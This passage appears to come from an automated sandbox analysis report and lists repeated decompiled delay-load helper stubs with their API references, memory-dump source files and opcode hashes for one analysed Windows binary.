                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: ebd7f5487998192a3d6dfafd57f73f0326e3827d1d16c459f4e35b0478a20dc2
                                                    • Instruction ID: 4edc2b211c1d517db0808f51904492a1d50d3363f06a74a664135d2c00720351
                                                    • Opcode Fuzzy Hash: ebd7f5487998192a3d6dfafd57f73f0326e3827d1d16c459f4e35b0478a20dc2
                                                    • Instruction Fuzzy Hash: 13B09281258145BC224461096E02C3A0118C091B18320422BB604C8280A8400C442436
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDE50D Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00CDE50D() {

				E00CDE85D(0xcfc66c, 0xd23090); // executed
				goto __eax;
			}



                                                    0x00cde51f
                                                    0x00cde526

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE51F
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: b499c5a94cec49c7da0073d93b9165b5ee182b6e0e1991888a9eb03aa6ba4073
                                                    • Instruction ID: d901c0898de7032e455e40ebe96c451dd669aa2411eecfdaddb51fbf25402681
                                                    • Opcode Fuzzy Hash: b499c5a94cec49c7da0073d93b9165b5ee182b6e0e1991888a9eb03aa6ba4073
                                                    • Instruction Fuzzy Hash: 97B012C135C045BC310431293E06C3B011CC0D1F18330403FF610CC6C1B8400D043432
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDE528 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00CDE528() {

				E00CDE85D(0xcfc66c, 0xd23084); // executed
				goto __eax;
			}



                                                    0x00cde51f
                                                    0x00cde526

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE51F
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: b89f841d95c0b845ab0ee70274fb06b173231146a4e6278e093c9facdfcd58fd
                                                    • Instruction ID: d9369021ef2d72499ab7fe389e816bde34870684eb8b5b518bcc91bac16c495e
                                                    • Opcode Fuzzy Hash: b89f841d95c0b845ab0ee70274fb06b173231146a4e6278e093c9facdfcd58fd
                                                    • Instruction Fuzzy Hash: DEB09281358085AD214461092E02C3A0518C091B18320802FB604C8280A8400C012432
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDE532 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00CDE532() {

				E00CDE85D(0xcfc66c, 0xd23080); // executed
				goto __eax;
			}



                                                    0x00cde51f
                                                    0x00cde526

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE51F
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 1fd10d91d9f9df279b5432b12e151dce663ac2bcb2522751c66f93049d73bb21
                                                    • Instruction ID: 1d458e69cf1336875d8c97b457d07dbc85e014781e2114fdbf794699b44a57f4
                                                    • Opcode Fuzzy Hash: 1fd10d91d9f9df279b5432b12e151dce663ac2bcb2522751c66f93049d73bb21
                                                    • Instruction Fuzzy Hash: 62B09281258045BE214461092E02D3A0118C091B18320412FF604C8280A8400C002432
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDE2CD Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 747564b174e68dd800eef8f1b377c566f9e2ced93376a546241ba11ada5c78d7
                                                    • Instruction ID: 32b4fe423967cc5005fa365fee481c6c3c90d30bb60a30702c8974e5a6ee6657
                                                    • Opcode Fuzzy Hash: 747564b174e68dd800eef8f1b377c566f9e2ced93376a546241ba11ada5c78d7
                                                    • Instruction Fuzzy Hash: 07A001E63AD18ABC354872566E46C7B021DC4C5B69330893FFA16C86C2A89068457872
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDE2C3 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: a9ebd94dde72b00b745ca18f9542677e462782ac7f9ec5fa6b636d3c768642c1
                                                    • Instruction ID: 32b4fe423967cc5005fa365fee481c6c3c90d30bb60a30702c8974e5a6ee6657
                                                    • Opcode Fuzzy Hash: a9ebd94dde72b00b745ca18f9542677e462782ac7f9ec5fa6b636d3c768642c1
                                                    • Instruction Fuzzy Hash: 07A001E63AD18ABC354872566E46C7B021DC4C5B69330893FFA16C86C2A89068457872
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDE2D7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 7ae3ccf22d12ad5e4eb9a37b793cd4a2d225eac0290722713f2d1c9f2d3c5375
                                                    • Instruction ID: 32b4fe423967cc5005fa365fee481c6c3c90d30bb60a30702c8974e5a6ee6657
                                                    • Opcode Fuzzy Hash: 7ae3ccf22d12ad5e4eb9a37b793cd4a2d225eac0290722713f2d1c9f2d3c5375
                                                    • Instruction Fuzzy Hash: 07A001E63AD18ABC354872566E46C7B021DC4C5B69330893FFA16C86C2A89068457872
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDE29B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 9834e53d724afc10a92121470adf7417b088ec847316550bb4aef95d13dd5ce9
                                                    • Instruction ID: 32b4fe423967cc5005fa365fee481c6c3c90d30bb60a30702c8974e5a6ee6657
                                                    • Opcode Fuzzy Hash: 9834e53d724afc10a92121470adf7417b088ec847316550bb4aef95d13dd5ce9
                                                    • Instruction Fuzzy Hash: 07A001E63AD18ABC354872566E46C7B021DC4C5B69330893FFA16C86C2A89068457872
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDE291 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 78a0318e684395c565cef246eda468dae07e002fb19effc05d909ecc40e5f090
                                                    • Instruction ID: 32b4fe423967cc5005fa365fee481c6c3c90d30bb60a30702c8974e5a6ee6657
                                                    • Opcode Fuzzy Hash: 78a0318e684395c565cef246eda468dae07e002fb19effc05d909ecc40e5f090
                                                    • Instruction Fuzzy Hash: 07A001E63AD18ABC354872566E46C7B021DC4C5B69330893FFA16C86C2A89068457872
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDE2AF Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: db1babc88a72de3b1b47c92c3561b2fb04d8ca18855abf0dd7b7acb3c0d012f1
                                                    • Instruction ID: 32b4fe423967cc5005fa365fee481c6c3c90d30bb60a30702c8974e5a6ee6657
                                                    • Opcode Fuzzy Hash: db1babc88a72de3b1b47c92c3561b2fb04d8ca18855abf0dd7b7acb3c0d012f1
                                                    • Instruction Fuzzy Hash: 07A001E63AD18ABC354872566E46C7B021DC4C5B69330893FFA16C86C2A89068457872
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDE2A5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: ae7f872bf747292a1f828fd7a2c63f56bdc58d47ca453709db728b04de00d283
                                                    • Instruction ID: 32b4fe423967cc5005fa365fee481c6c3c90d30bb60a30702c8974e5a6ee6657
                                                    • Opcode Fuzzy Hash: ae7f872bf747292a1f828fd7a2c63f56bdc58d47ca453709db728b04de00d283
                                                    • Instruction Fuzzy Hash: 07A001E63AD18ABC354872566E46C7B021DC4C5B69330893FFA16C86C2A89068457872
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDE25F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 82d14ec481e3ccc3bd41a4eedaf58dd6af61c082f026ab79437fe6e182af1f28
                                                    • Instruction ID: 32b4fe423967cc5005fa365fee481c6c3c90d30bb60a30702c8974e5a6ee6657
                                                    • Opcode Fuzzy Hash: 82d14ec481e3ccc3bd41a4eedaf58dd6af61c082f026ab79437fe6e182af1f28
                                                    • Instruction Fuzzy Hash: 07A001E63AD18ABC354872566E46C7B021DC4C5B69330893FFA16C86C2A89068457872
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDE27D Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: e7f9d28a080d01f69019e9ef4c135bc2547f33b5f416d45fc74b6eeb14a05eb8
                                                    • Instruction ID: 32b4fe423967cc5005fa365fee481c6c3c90d30bb60a30702c8974e5a6ee6657
                                                    • Opcode Fuzzy Hash: e7f9d28a080d01f69019e9ef4c135bc2547f33b5f416d45fc74b6eeb14a05eb8
                                                    • Instruction Fuzzy Hash: 07A001E63AD18ABC354872566E46C7B021DC4C5B69330893FFA16C86C2A89068457872
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDE219 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 9d6cf4b5cab08ad41f9333296d35707b8d5b8e826d68c3a0e98c8370b617e743
                                                    • Instruction ID: 32b4fe423967cc5005fa365fee481c6c3c90d30bb60a30702c8974e5a6ee6657
                                                    • Opcode Fuzzy Hash: 9d6cf4b5cab08ad41f9333296d35707b8d5b8e826d68c3a0e98c8370b617e743
                                                    • Instruction Fuzzy Hash: 07A001E63AD18ABC354872566E46C7B021DC4C5B69330893FFA16C86C2A89068457872
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDE3EF Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE3FC
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
